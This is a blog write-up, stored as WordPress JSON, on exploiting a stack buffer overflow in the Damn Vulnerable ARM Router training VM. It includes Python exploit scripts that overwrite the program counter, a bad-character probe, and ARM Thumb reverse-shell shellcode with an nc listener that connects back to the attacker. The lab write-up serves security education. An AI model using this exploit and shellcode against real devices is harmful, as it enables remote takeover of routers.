{"id":861,"date":"2024-03-17T01:48:27","date_gmt":"2024-03-17T00:48:27","guid":{"rendered":"https:\/\/babdcatha.net\/?p=861"},"modified":"2024-03-17T02:39:34","modified_gmt":"2024-03-17T01:39:34","slug":"damn-vulnerable-arm-router-writeup","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2024\/03\/17\/damn-vulnerable-arm-router-writeup\/","title":{"rendered":"Damn Vulnerable Arm Router Writeup"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi, coming back after a few months, I wanted to try something a little different. Today, we will be taking a look at the Damn Vulnerable Arm Router (DVAR) machine from <a href=\"https:\/\/www.vulnhub.com\/author\/saumil-shah,576\/\">Saumil Shah<\/a>. The goal of this machine is to find and exploit a buffer overflow vulnerability on a simulated router running on an ARM architecture.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The writeup will be split into the following parts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Setup\">Setup<\/a><\/li>\n\n\n\n<li><a href=\"#First_look\">First look<\/a><\/li>\n\n\n\n<li><a href=\"#GDB\">Setting up GDB<\/a><\/li>\n\n\n\n<li><a href=\"#Exploit\">Writing the exploit<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Setup\">Setup<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The first step was getting the project to run. The project can be downloaded from <a href=\"https:\/\/www.vulnhub.com\/entry\/damn-vulnerable-arm-router-dvar-tinysploitarm,224\/\">VulnHub<\/a>. 
It can be run as-is using VMware, but if you prefer to use VirtualBox, the image can be converted using <a href=\"https:\/\/developer.vmware.com\/web\/tool\/ovf\/\">Ovftool<\/a> and the following command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">ovftool \"image.vmx\" \"image.ovf\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Make sure to set the network interface in <code>Bridge<\/code> mode, or the router won&#8217;t be accessible from outside the VM.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since we are going to debug ARM binaries, we need to have the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>gdb-multiarch<\/code><\/mark> package installed on the machine doing the debugging.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I will also be using <a href=\"https:\/\/github.com\/hugsy\/gef\">GEF<\/a>, so I recommend adding it to your <code>.gdbinit<\/code> file to have it launch automatically at the start of GDB.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Finally, we will be compiling\/assembling a reverse shell for an ARM architecture. 
You can either compile it on a virtual machine emulating an ARM processor or install the <code>gcc-arm-linux-gnueabi<\/code> package.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"First_look\">First look<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">After launching the VM, we are greeted with the following screen:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"401\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome.png\" alt=\"\" class=\"wp-image-867\" style=\"width:566px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome.png 720w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Router_welcome-300x167.png 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Navigating to the provided IP, we land on the following page:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"811\" height=\"912\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look.png\" alt=\"\" class=\"wp-image-868\" style=\"width:544px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look.png 811w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look-267x300.png 267w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/Interface_first_look-768x864.png 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This looks like the interface we are supposed to attack. We can try to modify parameters, but the server does not seem to respond to these requests. We&#8217;ll need to investigate this. Let&#8217;s ssh into the router (root without a password) to learn more about the process. 
We can find the listening processes using the <code>netstat<\/code> command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"562\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-1024x562.png\" alt=\"\" class=\"wp-image-874\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-1024x562.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-300x165.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat-768x421.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/netstat.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>lightsrv<\/code> is supposed to be a bonus challenge, so let&#8217;s focus on <code>miniweb<\/code> first.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"GDB\">Setting up GDB<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Now that we know which process to target, we can start a remote debug session on the router using <code>gdbserver<\/code> and attach it to the running <code>miniweb<\/code> process:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">gdbserver --attach localhost:5000 $PID<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, the PID of the <code>miniweb<\/code> process is 245.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On our Kali machine, we can launch our multiarch gdb with <a href=\"https:\/\/github.com\/hugsy\/gef\">GEF<\/a> to start debugging the remote process:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">gdb-multiarch -q\ngef-remote $IP $PORT<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Immediately after we start using it, we can see that the <code>miniweb<\/code> binary uses forks to serve webpages to its clients. 
<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"1024\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-933x1024.png\" alt=\"\" class=\"wp-image-897\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-933x1024.png 933w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-273x300.png 273w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks-768x843.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_forks.png 1280w\" sizes=\"auto, (max-width: 933px) 100vw, 933px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This is to be expected from a web server. Since these forks will be handling our inputs, we will need to follow these forks instead of the main process in order to find our exploit. This can be done using the following gdb command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">set follow-fork-mode child<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If we now try saving a configuration from the webpage, this is what we get:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-1024x612.png\" alt=\"\" class=\"wp-image-906\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-1024x612.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv-768x459.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_sigsegv.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">A Segmentation fault! 
And the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register seems to have been overwritten with the string <code>\"ddr_\"<\/code>, probably contained in the web request we just sent. If we look at it using <code>Burp<\/code>, we can indeed see the <code>\"ddr_\"<\/code> string repeated several times.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"352\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-1024x352.png\" alt=\"\" class=\"wp-image-921\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-1024x352.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-300x103.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request-768x264.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_request.png 1100w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The next step after this is to begin writing the exploit.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Exploit\">Writing the exploit<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The first step is to find the right offset for the program counter. This can be done using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_create<\/mark> and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_offset<\/mark> tools from the Metasploit Framework. 
We will create a pattern of length 1000, place it in our request and check the offsets of the different registers we can overwrite.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"285\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-1024x285.png\" alt=\"\" class=\"wp-image-926\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-1024x285.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-300x83.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create-768x214.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_create.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Creating the pattern<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"396\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-1024x396.png\" alt=\"\" class=\"wp-image-927\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-1024x396.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-300x116.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern-768x297.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/burp_pattern.png 1098w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Sending the pattern using Burp<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We get this output on the debugger console:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" 
src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-1024x610.png\" alt=\"\" class=\"wp-image-929\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-1024x610.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern-768x457.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_pattern.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The program counter seems to be set right below the link register (If I remember correctly, this is because the LSB of the program counter is used to switch between ARM and Thumb modes). We now calculate the offset to the link register using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">pattern_offset<\/mark> tool:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"175\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-1024x175.png\" alt=\"\" class=\"wp-image-932\" style=\"width:750px;height:auto\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-1024x175.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-300x51.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset-768x131.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/pattern_offset.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We find that the link register is at offset 333 from our input. 
We can repeat this test a few more times to ensure that there is no variability in the offset, but in this case, the offset is constant.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can now create a small Python script to write the value of our choice in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">import requests\n\n# Exploit parameters\nURL = \"http:\/\/192.168.1.100\/basic.html?\"\noffset = 333\n\n# Filling memory with 'A' (0x41) up to the pc offset\nfiller = 'A' * offset\n\n# The value to be written to the pc\npc = 'BBBB'\n\n# Creating the complete payload\npayload = URL + filler + pc\n\n# Making the malicious request\nr = requests.get(url=payload)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we execute it, we get the expected value in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\"><code>$pc<\/code><\/mark> register.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"610\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-1024x610.png\" alt=\"\" class=\"wp-image-938\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-1024x610.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-300x179.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB-768x457.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_BBBB.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The next step is finding out how we can exploit this to jump to code we can control.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can see what security features are enabled using the <mark 
style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">checksec<\/mark> GEF command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"562\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-1024x562.png\" alt=\"\" class=\"wp-image-941\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-1024x562.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-300x165.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec-768x421.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_checksec.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, no particular security measure was put in place to prevent us from writing code to the stack and jumping to it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To take advantage of this, we are going to do the following:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Find the offset of the stack<\/li>\n\n\n\n<li>Find out what bytes we can and cannot use<\/li>\n\n\n\n<li>Create a reverse shell and write it on the stack<\/li>\n\n\n\n<li>Write the address of the stack to the PC<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">If everything works correctly, we should then get a reverse shell.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For the first step, looking back at our pattern, we can see that the data <code>$sp<\/code> points to (<code>7Al8<\/code>) is located at offset 353. We can also see that the <code>sp<\/code> will always point to address <code>0xbefffe48<\/code>. 
Because of this, we can get away with jumping directly to the stack, instead of finding a gadget to make us jump there.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In order to get our payload in the right place, we add a small nopsled of 16 bytes to get from the <code>pc<\/code> to the start of the stack. In our case, since ASLR is not enabled, we can use anything for this pseudo-nopsled.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This gives us the following updated Python code:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">import requests\n\n# Exploit parameters\nURL = \"http:\/\/192.168.1.100\/basic.html?\"\npc_offset = 333\nsp_offset = 353\n\n# Filling memory with 'A' (0x41) up to the pc offset\nfiller = 'A' * pc_offset\n\n# The value to be written to the pc ($sp), URL-encoded little-endian\npc = '%A8%BB%FF%BE'\n\n# Setting up a pseudo-nopsled before the payload\nnopsled = \"CCCC\" * (((sp_offset - pc_offset) \/\/ 4) - 1)\n\n# The payload to execute\npayload = \"DDDD\"\n\n# Creating the complete payload\nexploit = URL + filler + pc + nopsled + payload\n\n# Making the malicious request\nr = requests.get(url=exploit)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For the second step, we are going to send every possible byte in our payload, and note the bytes that are not correctly written to memory. We can already exclude the null byte (<code>0x00<\/code>) as it cannot be sent in query parameters.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In our case, it looks like only bytes from the ASCII table can be used, as values above <code>0x7F<\/code> will be converted to UTF-8 and a <code>0xC2<\/code> byte will be appended after. 
This seemed a bit weird to me, so I investigated and found out that almost all bytes could be sent, if we URL encoded them first.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Using this payload:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">payload = \"%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We get the following bytes written to the stack:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-13\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"666\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-1024x666.png\" alt=\"\" class=\"wp-image-971\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-1024x666.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-300x195.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars-768x500.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/gef_badchars.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Only byte <code>0x22<\/code> is not correctly sent.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we can 
work on the last step of our exploit development. We need a payload to execute. I will start with a basic reverse shell from <a href=\"https:\/\/azeria-labs.com\/tcp-reverse-shell-in-assembly-arm-32-bit\/\">Azeria<\/a>. I save the assembly shellcode in a file called <code>shell.asm<\/code>, and execute the following commands to assemble it and get the raw machine code in the right format for the payload (see the blog post on Azeria Labs for explanations):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">arm-linux-gnueabi-as shell.asm -o reverse_shell.o -march=armv6 &amp;&amp; arm-linux-gnueabi-ld -N reverse_shell.o -o reverse_shell\n\narm-linux-gnueabi-objcopy -O binary reverse_shell reverse_shell.bin\n\nhexdump -v -e '\"x\" 1\/1 \"%02x\" \"\"' reverse_shell.bin | tr \"x\" \"%\" <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This command gives us our shellcode, ready to be pasted in our Python script:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-14\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"227\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-1024x227.png\" alt=\"\" class=\"wp-image-992\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-1024x227.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-300x67.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode-768x170.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/shellcode.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We can now start a listener on port 4444 of our Kali machine:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">nc -lvnp 4444<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We should now be ready to exploit the router, but a small problem arises. 
When we execute our script, we get a ping on our listener, but our reverse shell disconnects instantly.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large wp-duotone-unset-15\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"210\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-1024x210.png\" alt=\"\" class=\"wp-image-998\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-1024x210.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-300x61.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash-768x157.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/crash.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Our shell instantly exits<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">After a bit of debugging, I found <a href=\"https:\/\/stackoverflow.com\/questions\/36673765\/why-can-the-execve-system-call-run-bin-sh-without-any-argv-arguments-but-not\">this<\/a> post on StackOverflow. To summarize, programs usually require the first argument of <code>argv<\/code> to be the program name. This is usually not a problem with <code>sh<\/code>, so this was not implemented in Azeria&#8217;s shell to save on space. However, this seems to be necessary with the busybox implementation of <code>sh<\/code>. After a bit of tinkering, I was able to produce this assembly, which pushes the path onto the stack with a null pointer, and points to this as its second argument. 
I tried to do this in the payload, but using the stack was easier, since we need a pointer to a pointer to the arguments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This is the shellcode I ended up using:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"asm\" class=\"language-asm\">.section .text\n.global _start\n\n_start:\n .ARM\n add   r3, pc, #1       \/\/ switch to thumb mode \n bx    r3\n\n.THUMB\n\/\/ socket(2, 1, 0) \n mov   r0, #2\n mov   r1, #1\n sub   r2, r2\n mov   r7, #200\n add   r7, #81         \/\/ r7 = 281 (socket) \n svc   #1              \/\/ r0 = resultant sockfd \n mov   r4, r0          \/\/ save sockfd in r4 \n\n\/\/ connect(r0, &amp;sockaddr, 16) \n adr   r1, struct        \/\/ pointer to address, port \n strb  r2, [r1, #1]    \/\/ write 0 for AF_INET \n mov   r2, #16\n add   r7, #2          \/\/ r7 = 283 (connect) \n svc   #1\n\n\/\/ dup2(sockfd, 0) \n mov   r7, #63         \/\/ r7 = 63 (dup2) \n mov   r0, r4          \/\/ r4 is the saved sockfd \n sub   r1, r1          \/\/ r1 = 0 (stdin) \n svc   #1\n \n\/\/ dup2(sockfd, 1) \n mov   r0, r4          \/\/ r4 is the saved sockfd \n mov   r1, #1          \/\/ r1 = 1 (stdout) \n svc   #1\n \n\/\/ dup2(sockfd, 2) \n mov   r0, r4         \/\/ r4 is the saved sockfd \n mov   r1, #2         \/\/ r1 = 2 (stderr)\n svc   #1\n\n\/\/ execve(\"\/bin\/sh\", argv, 0) with argv = {\"\/bin\/sh\", NULL} \n adr   r0, binsh\n sub   r2, r2\n push  {r2}          \/\/ Pushing argv[1] = NULL first,\n push  {r0}          \/\/ then argv[0], since the stack grows downwards\n mov   r1, sp        \/\/ sp now points to argv; pass it as the second argument\n strb  r2, [r0, #7]  \/\/ null-terminating the binsh string\n mov   r7, #11       \/\/ r7 = 11 (execve) \n svc   #1\n\nstruct:\n.ascii \"\\x02\\xff\"      \/\/ AF_INET 0xff will be NULLed \n.ascii \"\\x11\\x5c\"      \/\/ port number 4444 \n.byte 192,168,XXX,XXX  \/\/ IP Address \nbinsh:\n.ascii \"\/bin\/shX\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We can now compile our code again, and this time, we get our 
reverse shell as expected:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-16\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"331\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-1024x331.png\" alt=\"\" class=\"wp-image-1013\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-1024x331.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-300x97.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working-768x248.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2024\/03\/revshell_working.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And just like that, this challenge is now complete!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi, coming back after a few months, I wanted to try something a little different. Today, we will be taking a look at the Damn Vulnerable Arm Router (DVAR) machine from Saumil Shah. 
The goal of this machine is to find and exploit a buffer overflow vulnerability on a simulated router running on an ARM [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[],"class_list":["post-861","post","type-post","status-publish","format-standard","hentry","category-writeups"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=861"}],"version-history":[{"count":134,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions"}],"predecessor-version":[{"id":1027,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions\/1027"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=